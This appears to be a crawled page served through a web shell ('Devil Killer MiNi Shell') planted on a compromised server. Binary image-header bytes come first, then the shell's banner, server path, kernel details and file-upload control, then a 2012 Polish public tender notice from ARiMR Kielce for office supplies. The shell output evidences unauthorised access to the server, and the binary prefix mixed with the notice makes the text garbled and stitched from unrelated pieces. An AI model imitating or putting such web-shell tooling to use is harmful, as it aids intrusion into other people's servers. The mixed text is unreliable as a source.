JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120723/159835-N-2012.html

<p class="kh_header"><b>Kielce: Dostawa artykułów biurowych na potrzeby 
Świętokrzyskiego Oddziału Regionalnego ARiMR i Biur Powiatowych</b><br>
<b>Numer ogłoszenia: 159835 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Świętokrzyski Oddział Regionalny , ul. Warszawska 430, 25-414 Kielce, woj. świętokrzyskie, tel. 041 3490900.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> WWW.ARIMR.GOV.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych na potrzeby 
Świętokrzyskiego Oddziału Regionalnego ARiMR i Biur Powiatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje dostawę w rozumieniu art. 2 pkt 2 ustawy Prawo zamówień publicznych tj. nabycie materiałów biurowych wyszczególnionych w formularzu cenowym, zawartym w załączniku nr 1 do SIWZ, wraz z ich dostarczeniem do wskazanych pomieszczeń w siedzibie Oddziału Regionalnego i Biur Powiatowych ARiMR. 

2.	Zamawiający wymaga, aby oferowany przedmiot zamówienia był wysokiej jakości, fabrycznie nowy, kompletny, posiadał wymagane prawem atesty i certyfikaty (pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów lub pełnowartościowych komponentów z odzysku, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta 
z widocznym logo, symbolem produktu i terminem przydatności do użytku, posiadające wszelkie zabezpieczenia w tym szczelności itp.).

3.	Odbiór przedmiotu zamówienia odbywać się może w dni robocze w godz. od 8:30 do 14:00 i będzie każdorazowo potwierdzony poprzez podpisanie przez przedstawicieli obu Stron protokołów, stanowiących załącznik nr 3 do Umowy.

4.	Cena ma obejmować wszystkie koszty, które poniesie wykonawca, łącznie z dostawą przedmiotu zamówienia i jego rozładunkiem w siedzibie Zamawiającego.

5.	Zamawiającemu przysługuje prawo odmowy odbioru części lub całości materiałów biurowych jeżeli dostarczone materiały biurowe są niekompletne, niezgodne ze specyfikacją, posiadają wady albo ślady zewnętrznego uszkodzenia lub w innych uzasadnionych przypadkach. Zamawiający wskaże w protokole odbioru, przyczyny odmowy odbioru oraz wyznaczy nowy termin dostarczenia materiałów biurowych. Procedura czynności odbioru zostanie powtórzona.

6.	Wykonawca udzieli Zamawiającemu minimum 12 miesięcznej gwarancji na dostarczone materiały biurowe, licząc od dnia podpisania protokółu odbioru.


1	Bloczek samoprzylepny 38x51 (+- 5mm), kolor żółty (substancja klejąca usuwalna za pomocą wody) - Ilość kartek w bloczku 100	bl	 740	 	 		
2	Bloczek samoprzylepny 76x51 mm (+- 10mm), kolor żółty (substancja klejąca usuwalna za pomocą wody)  Ilość kartek w bloczku 100	bl	715	 	 		
3	Bloczek samoprzylepny 76*76 mm (-+ 10mm), kolor żółty (substancja klejąca usuwalna za pomocą wody) - Ilość kartek w bloczku 100	bl	525	 	 		
4	Blok notatnikowy A4 (min 50 kartek) KRATKA	bl	205	 	 		
5	Blok notatnikowy A5 (min 50 kartek) KRATKA	bl	215	 	 		
6	Chusteczki nasączane do ekranów.   Opakowanie zawiera 100 nasączonych biodegradowalnych ściereczek do czyszczenia ekranów, szyb skanerów, komputerów PDA, filtrów monitorów, ekranów, monitorów CRC, TFT/LCD i laptopów. Nie pozostawiają smug, posiadają właściwości antystatyczne, nie zawierają alkoholu,  przebadane dermatologicznie.  	op.	119	 	 		
7	Datownik (samo tuszujący w obudowie z tworzywa sztucznego ABS., data w wersji ISO rok-miesiąc-dzień) wysokość cyfr 4 mm	szt.	112	 	 		
8	Długopis automatyczny z wymiennym wkładem. Gumowana obudowa w kolorze tuszu z klipsem. Długość linii pisania  minimum 1200 m. Kolor czerwony	szt.	202	 	 		
9	Długopis automatyczny z wymiennym wkładem. Gumowana obudowa w kolorze tuszu z klipsem. Długość linii pisania  minimum 1200 m. Kolor niebieski	szt.	1069	 	 		
10	Długopis automatyczny z wymiennym wkładem. Gumowana obudowa w kolorze tuszu z klipsem. Długość linii pisania  minimum 1200 m. Kolor czarny	szt.	539	 	 		
11	Długopis taki jak Zenith - typ wkładu zenith 4, niebieski	szt.	100	 	 		
12	Długopis z przylepcem, z wymiennym wkładem. Podstawka i długopis połączone srebrnym łańcuszkiem podstawka stabilna z naklejką samoprzylepną umożliwiająca umocowanie zestawu w jednym miejscu, długopis wykonany z tworzywa, długość łańcuszka minimum 58 cm	szt.	190	 	 		
13	Długopis żelowy z wymiennym wkładem. Przezroczysta obudowa.  Koncówka ze wzmocnionej nierdzewnej stali. Ergonomiczny, wygodny uchwyt. Szerokosć linii pisania maxymalnie 0,32 mm; długość linii pisania minimum 1000 m, posiada skuwkę - czarny                              	szt.	470	 	 		
14	Długopis żelowy z wymiennym wkładem. Przezroczysta obudowa.  Koncówka ze wzmocnionej nierdzewnej stali. Ergonomiczny, wygodny uchwyt. Szerokosć linii pisania maxymalnie 0,32 mm; długość linii pisania minimum 1000 m, posiada skuwkę - czerwony  	szt.	210	 	 		
15	Długopis żelowy z wymiennym wkładem. Przezroczysta obudowa.  Końcówka ze wzmocnionej nierdzewnej stali. Ergonomiczny, wygodny uchwyt. Szerokość linii pisania maksymalnie 0,32 mm; długość linii pisania minimum 1000 m, posiada skuwkę - niebieski	szt.	990	 	 		
16	Długopis wykonany z transparentnego, matowego plastiku. Posiada duży, niebieski wkład oraz gumkę antypoślizgową. Kolor zielony, Wielkość ok. 14,3 x  0,8 cm, Materiał plastik, Waga ok. 0,008 kg, Budowa umożliwiająca NadrukSitodruk, Tampodruk (AB)Wielkość nadruku 4 x 0,5 cm Opakowanie jednostkowe 50 szt. 	szt.	2000	 	 		
17	DRUK KWITARIUSZ PRZYCHODOWY format A5, na papierze samokopiującym, oryginał plus dwie kopie bloczek 100szt.	szt.	274	 	 		
18	Dziurkacz metalowy, odległość między dziurkami 80 mm, jednorazowo dziurkuje minimum 30 kartek, z wysuwanym ogranicznikiem ze wskaźnikiem środka strony	szt.	65	 	 		
19	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g/m2, podkład 60 g/m2, temperatura użytkowania:
 -20 °C do 80 °C. Rozmiar (mm) 70 x 42,3 ; arkuszy w j.s. 100, ilość etykiet na arkuszu 21 ; ilość etykiet w opakowaniu 2100	opak.	13	 	 		
20	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g/m2, podkład 60 g/m2, temperatura użytkowania:  -20 °C do 80 °C. Rozmiar (mm) 105 x 148 ; arkuszy w j.s. 100, ilość etykiet na arkuszu 4 ; ilość etykiet w opakowaniu 400	opak.	42	 	 		
21	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g-m2, podkład 60 g-m2, temperatura użytkowania:  -20 °C do 80 °C. Rozmiar (mm) 105 x74 ; arkuszy w j.s. 100, ilość etykiet na arkuszu 8 ; ilość etykiet w opakowaniu 800	opak.	12	 	 		
22	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g-m2, podkład 60 g-m2, temperatura użytkowania:  -20 °C do 80 °C. Rozmiar (mm) 297 x 210  ; arkuszy w j.s. 100, ilość etykiet na arkuszu 1 ; ilość etykiet w opakowaniu 100	opak.	165	 	 		
23	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g/m2, podkład 60 g/m2, temperatura użytkowania:  -20 °C do 80 °C. Rozmiar (mm) 210 x 148 ; arkuszy w j.s. 100, ilość etykiet na arkuszu 2 ; ilość etykiet w opakowaniu 200	opak.	33	 	 		
24	Etykiety samoprzylepne, przeznaczone  do  drukarek igłowych, atramentowych i  laserowych . Posiadają krawędzie bezpieczeństwa, które zapobiegają odkładaniu się kleju na mechanizmie drukarki. Format arkusza A4, gramatura: front 70 g/m2, podkład 60 g/m2, temperatura użytkowania:
 -20 °C do 80 °C. Rozmiar (mm) 105 x 48 ; arkuszy w j.s. 100, ilość etykiet na arkuszu 12 ; ilość etykiet w opakowaniu 1200	opak	10	 	 		
25	GĄBKI do pieczątek  WAGRAF, Piast 1,(10x28mm)	szt.	10	 	 		
26	GĄBKI do pieczątek colop e-q24	szt.	41	 	 		
27	GĄBKI do pieczątek  colop E10	szt.	45	 	 		
28	GĄBKI do pieczątek      SHINY printer, s-823,(47x18mm)	szt.	51	 	 		
29	GĄBKI do pieczątek      SHINY printer, s-824,(22x58mm)	szt.	43	 	 		
30	GĄBKI do pieczątek      TRODAT, printy 4913,(58x22mm)	szt.	41	 	 		
31	GĄBKI do pieczątek      TRODAT, printy-dater 4810(3.8mm)	szt.	36	 	 		
32	GĄBKI do pieczątek      WAGRAF 4,(58x22mm)	szt.	39	 	 		
33	GĄBKI do pieczątek      WAGRAF, Piast 2,(14x38mm)	szt.	61	 	 		
34	Gumka do wycierania ołówka, nie narusza struktury papieru, bardzo miękka, nie twardnieje i nie pęka. Wymiar: minimum 65,0x24,2x12,4mm. Posiada atest atest PZH HŻ/12985/01	szt.	175	 	 		
35	Klej z dozownikiem w kształcie pędzelka. Bezzapachowy, do papieru, kartonu. Specjalna konstrukcja pędzelka powoduje, że klej wypływa tylko przy zetknięciu pędzelka z powierzchnią. Przezroczysta buteleczka pozwala kontrolować ilość kleju. Zawartość 50 ml.	szt.	259	 	 		
36	Klips archiwizacyjny plastikowy umożliwiający szybkie i łatwe przenoszenie dokumentów z segregatora do pudełek na akta (op.100 szt)	opak.	167	 	 		
37	Klips biurowy 19 mm. OP.=12 szt. Metalowy, galwanizowany.	opak.	167	 	 		
38	Klips biurowy 32 mm. OP.=12 szt. Metalowy, galwanizowany.	opak.	122	 	 		
39	Klips biurowy 51 mm. OP.=12 szt. Metalowy, galwanizowany.	opak.	32	 	 		
40	Koperta LDS biała 300 x 460 x 40 mm z rozszerzanymi bokami i spodem, wykonana z dwóch warstw białego papieru 2 x 110g	szt.	525	 	 		
41	KOPERTY C4 BIAŁE (250 szt.w  opk.) SAMOPRZYLEPNE.	opak.	82	 	 		
42	KOPERTY C5 BIAŁE (500 szt.w  opk.) SAMOPRZYLEPNE	opak.	53	 	 		
43	KOPERTY DL ( z okienkiem prawym)  BIAŁE (1.000 szt.w  opk.) SAMOPRZYLEPNE.	opak.	201	 	 		
44	KOPERTY ROZSZERZANE E4 280X400X40 BIAŁY HK RBD (250 szt.w  opk.)	opak.	17	 	 		
45	Kostka biała klejona. Rozmiar 85 x 85 x 40 mm.	szt.	415	 	 		
46	Koszulka A4. Krystaliczna ( nie groszkowa). Wykonana z folii PP  minimum 50 mic. OP=100 szt.	opak.	675	 	 		
47	Nożyczki biurowe 21cm z satynowym ostrzem ze stali nierdzewnej, ergonomiczny, gumowe  uchwyty	szt.	103	 	 		
48	Nożyk do kopert ostrze wykonane z nierdzewnej stali, ergonomiczny uchwyt w kolorze czarnym; długosć 19 cm 	szt.	17	 	 		
49	Ołówek automatyczny z wymiennym grafitem, posiadajacy opcję wysuwania wkładu poprzez przyciskanie. Posiada uchwyt z pierścieniem dla komfortu pisania. Posiada końcówkę absorbującą nacisk, zapewniającą gładsze pisanie. Wyposażony w gumkę do mazania.. Metalowa końcówka. Gumowa obudowa. Ołówek na grafity 0,5 mm	opak	216	 	 		
50	OŁÓWEK Z GUMKĄ	szt.	670	 	 		
51	Papier Format A4 (210X297), kolor ecri, ilość w opakowaniu - 250 arkuszy, gramatura 160 g/m2	op.	11	 	 		
52	Papier ksero. Format A5. Gramatura 120 g/m2. Biały. Op.=250 ark. DOSTAWA II 	szt.	80	 	 		
53	Papier ksero. Format A4;  Gramatura 80+/-2 g/m2; Wilgotność 3,8-5,0 %; Grubość 108+/-3 ?m; Białość 166+/-2 CIE; Nieprzezroczystośc 94 +2/-1 %; Przepuszczalnośc powietrza 1.250 cm 3/min; Gładkość 160+/- 50 cm3/min; warunki klimatyzacji: RH 50 +/- 2%; Temperatura 23 +/- 1 oC; PN-EN-20187:2000 (DOSTAWA I )	ryza	3100	 	 		
54	Papier ksero. Format A4; Gramatura 80+/-2 g/m2; Wilgotność 3,8-5,0 %; Grubość 108+/-3 ?m; Białość 166+/-2 CIE; Nieprzeźroczystość 94 +2/-1 %; Przepuszczalność powietrza  1.250 cm 3/min; Gładkość 160+/- 50 cm3/min; warunki klimatyzacji: RH 50 +/- 2%; Temperatura 23 +/- 1 oC; PN-EN-20187:2000  (DOSTAWA II )	ryza	3595	 	 		
55	Papier ksero. Format A3; Gramatura 80+/-2 g/m2; Wilgotność 3,8-5,0 %; Grubość 108+/-3 ?m; Białość 166+/-2 CIE; Nieprzeźroczystość 94 +2/-1 %; Przepuszczalność powietrza  1.250 cm 3/min; Gładkość 160+/- 50 cm3/min; warunki klimatyzacji: RH 50 +/- 2%; Temperatura 23 +/- 1 oC; PN-EN-20187:2000  DOSTAWA II 	ryza	35	 	 		
56	Papier FOTOGRAFICZNY A4 do drukarek laserowych - błyszczący op.100ark 	op.	3	 	 		
57	Delikatna, antystatyczna pianka Działa skutecznie na wszystkich rodzajach powierzchni (np. klawiatury, drukarki, blaty) i usuwa nawet najcięższe plamy np. z tuszu. Zawiera składniki antystatyczne zapobiegające osadzaniu się kurzu Nie pozostawia smug
Objętość: 400 ml	szt.	146	 	 		
58	PŁYTA CD /50szt-opak. taka jak VERBATIM CD-R Super AZO Inkjet Printable-No ID - OPAKOWANIA SPINDLE	szt.	5480	 	 		
59	Powietrze sprężone - pojemność min 350ml	szt.	20	 	 		
60	Półka plastikowa na kartki formatu A4. Wykonana z odpornego na pęknięcia polistyrenu. 	szt.	216	 	 		
61	PRZEKŁADKI A4 kolorowa; wykonana z PP o grubości 120 um; wyposażona w kartę informacyjno opisową; ilość kartek w komplecie 10.	op.	177	 	 		
62	PRZYBORNIK BIUROWY, lakierowany metal w kolorze czarnym, 3 - komorowy, wymiar: minimum: 205 x 103 x 98 mm	szt.	53	 	 		
63	Pudełko archiwizacyjne A4; wykonany z bezkwasowej tektury falistej; szerokość grzbietu 70 mm; wymiary minimum: 315 x 230 x 700 mm (takie jak Vaupe-405)	szt.	3175	 	 		
64	ROZSZYWACZ	szt.	90	 	 		
65	SEGREGATOR  A4/70MM (Powlekany, z mechanizmem dźwigniowym, brzegi dolne okucie metalowe, opis segregatora wymienny)	szt.	1390	 	 		
66	SEGREGATOR A4/50MM (Powlekany, z mechanizmem dźwigniowym, brzegi dolne okucie metalowe, opis segregatora wymienny)	szt.	730	 	 		
67	SKOROSZYT PAPIEROWY PEŁNY NA OCZKA (skoroszyt kartonowy pełny z otworami pozwalającymi na wpięcie do segregatora, format A4)	szt.	58300
68	SKOROSZYT PLASTIKOWY A4 NA OCZKA (skoroszyt formatu A4 z otworami pozwalającymi na wpięcie do segregatora, tylna okładka kolorowa, przednia przeźroczysta, wysuwany papierowy pasek służący do opisu skoroszytu)	szt.	5650
69	SPINACZE DUŻE METALOWE 50mm (spinacze owalne srebrne, w opakowaniach po 100 szt.)	opak.	130
70	TAŚMA KLEJĄCA - PAKOWA Szeroka	szt.	111
71	TECZKA DO PODPISU A4; rozszerzany harmonijkowy grzbiet; twarde okładki oklejane PCV; 15 przegródek	szt.	8
72	Teczka wiązana do archiwizacji - 3 cm ( teczka wiązana wykonana z grubej tektury gr. Min. 700 g; szerokość grzbietu 3,0 cm; 3 klapy zabezpieczające dokumenty przed wypadnięciem - klapy na których bokach teczki minimalnie krótsze od boków do 1 cm; klapa dłuższego boku równa bokowi. Format A4	szt.	270
73	Teczka wiązana do archiwizacji - szeroka  ( teczka wiązana wykonana z grubej tektury gr. Min. 700 g; szerokość grzbietu 4,5 cm; 3 klapy zabezpieczające dokumenty przed wypadnięciem - klapy na krótszych bokach teczki minimalnie krótsze od boków do 1 cm; klapa dłuższego boku równa bokowi. Format A4.	szt.	300
74	TECZKA WIĄZANA tekturowa, biała A4; posiada 3 klapy zabezpieczające przed wypadnięciem.	szt.	5250
75	TECZKA Z GUMKĄ (teczka kartonowa posiadająca trzy klapy zabezpieczające dokumenty przed wypadnięciem, teczka barwiona, gumki w kolorze teczki- narożne ). Wykonana z preszpanu o gramaturze 390 g/m2. Wymiary: 235/319 mm. 	szt.	390
76	Temperówka wykonana z aluminium.	szt.	255
77	TUSZ do stempli buteleczka z końcówką ułatwiającą nasączanie poduszek; wodny; uniwersalny; do stempli ręcznych i samo tuszujących; nakrętka w kolorze tuszu; pojemność max 25 ml zielony	szt.	267
78	WKŁAD DO DŁUGOPISU - niebieski  (JAK WYŻEJ poz.9)	szt.	390
79	WKŁAD do długopisu żelowego niebieski (JAK WYŻEJ poz.15)	szt.	330
80	Zakładki indeksujące z dyspenserem, foliowe, format 45 x 12 x 35, 4 kolory w komplecie; substancja klejąca na bazie wody; intensywne kolory;; wielorazowe ; można po nich pisać cienkopisem lub markerami; perforacja umożliwia oderwanie każdego bloczka; wykonane z folii o grubości 60 ?m; dyspensery wykonane z PP. 	szt.	645
81	Zakreślacz posiadający klips ułatwiający przechowywanie. Żywe fluorescencyjne kolory. Owalny kształt obudowy. Wytrzymała ścięta końcówka. Grubość linii pisania 1,5 - 5,0 mm. Długość linii pisania minimum 600 metrów - kolor pomarańczowy, żólty 	szt.	415
82	ZESZYT A4 96K - TWARDA OPRAWA lakierowana; szyty	szt.	179
83	ZESZYT A5 96K - TWARDA OPRAWA lakierowana; szyty	szt.	140
84	Zszywacz metalowy na minimum 150 zszywek 24 lub 26; jednorazowo zszywa 30 kartek; głębokość zszywania 101 mm, z możliwością zaginania zszywek do wewnątrz i na zewnątrz.	szt.	141
85
Cienkopis kulkowy - kolor niebieski, obudowa w kolorze atramentu, specjalny dozownik wypływu atramentu V-system, pisze do ostatniej kropli. Linia pisania 0,30 mm, długość linii pisania  minimum 1400 m;  głowica pisząca ze stali nierdzewnej, kulka wykonana ze stopu wolframu i węglika, ATT System - skuwka w skuwce - umożliwia pisanie od razu po zdjęciu skuwki bez potrzeby rozpisywania	szt.	100
86	Kołobrulion A5; okładka  polipropylenowa; mikroperforacja; otwory do segregatora; ruchome przekładki z registrami; ilość kartek 120	szt.	500

87	Marker do CD, folii, plastiku, grubość linii pisania 0,4 mm ; długość linii pisania minimum 800 m; w 4 kolorach	szt.	200
88	Linijka  dł. 20 cm.	szt.	100
89	Teczka zawieszkowa A4; posiada zakładkę indeksową; uchwyt zawieszkowy wykonany z metalu; gramatura minimum 230 g/m2; w komplecie plastikowy indeks oraz kartoniki opisowe	szt.	100
90	Teczka z rączką i przekładkami. Wykonana z wytrzymałego polipropylenu, zewnętrznie usztywniona. Wyposażona w 12 transparentnych przegródek na dokumenty formatu A4. Dodatkowo posiada przekładki indeksujące oraz okienka opisowe. Zamykana na zatrzask z, z wygodnym uchwytem na grzbiecie.	szt.	10
91	Pudełko na 40 płty CD (zamykane  kluczyk, z tworzywa sztucznego), ruchome zakładki z miejscem na samoprzylepne etykiety, kolor szary, przezroczyste wieczko	szt.	10
92	Tablica korkowa w ramie drewnianej do wpinania informacji. Wymiar: 90*60 cm	szt.	30
93	Podstawka pod stopy; trwała i mocna konstrukcja, regulacja wysokości; taka jak FOOT ROCKER	szt.	50
94	KALKULATOR  Kalkulator biurowy z 12 pozycyjnym wyświetlaczem, funkcją obliczeń z wykorzystaniem pamięci oraz podwójnym zasilaniem. Obliczanie pamięci M+/M-; klawisz cofania; klawisz zmiany znaku; plastikowe klawisze, podwójne zasilanie, ilosć linii wyświetlacza - 1, Wymiary: minimum 102 x 124 x 25 mm     	szt.	66.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zgodnie z art. 45 ustawy Prawo zamówień publicznych Zamawiający żąda wniesienia przez wykonawców wadium, którego wysokość ustalona została na kwotę:
5 000,00 złotych (słownie złotych: dziesięć tysięcy złotych 00-100 groszy)
2.	Forma i zasady wniesienia wadium zostały określone w art. 45 ustawy Prawo zamówień publicznych
3.	Wadium musi być wniesione przez wykonawców przed upływem terminu wyznaczonego do składania ofert (w przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto zamawiającego - moment uznania konta zamawiającego).
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego wg danych:
- Nazwa banku i nr konta Zamawiającego:  	BGK ODDZ. KIELCE,  02 1130 1192 0000 3160 0020 0043
- Nazwa i adres Zamawiającego:  Agencja Restrukturyzacji i Modernizacji Rolnictwa
Świętokrzyski Oddział Regionalny  ul. Warszawska 430,  25 - 414 Kielce
- Tytuł wpłaty: 	Wadium - Przetarg nieograniczony na Dostawę artykułów biurowych na potrzeby Świętokrzyskiego Oddziału Regionalnego ARiMR i Biur Powiatowych
5.	Zasady zwrotu bądź zatrzymania wadium wykonawcom określone zostały w art. 46 Prawa zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o braku podstaw do wykluczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz, w-g załącznika nr 4 (w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
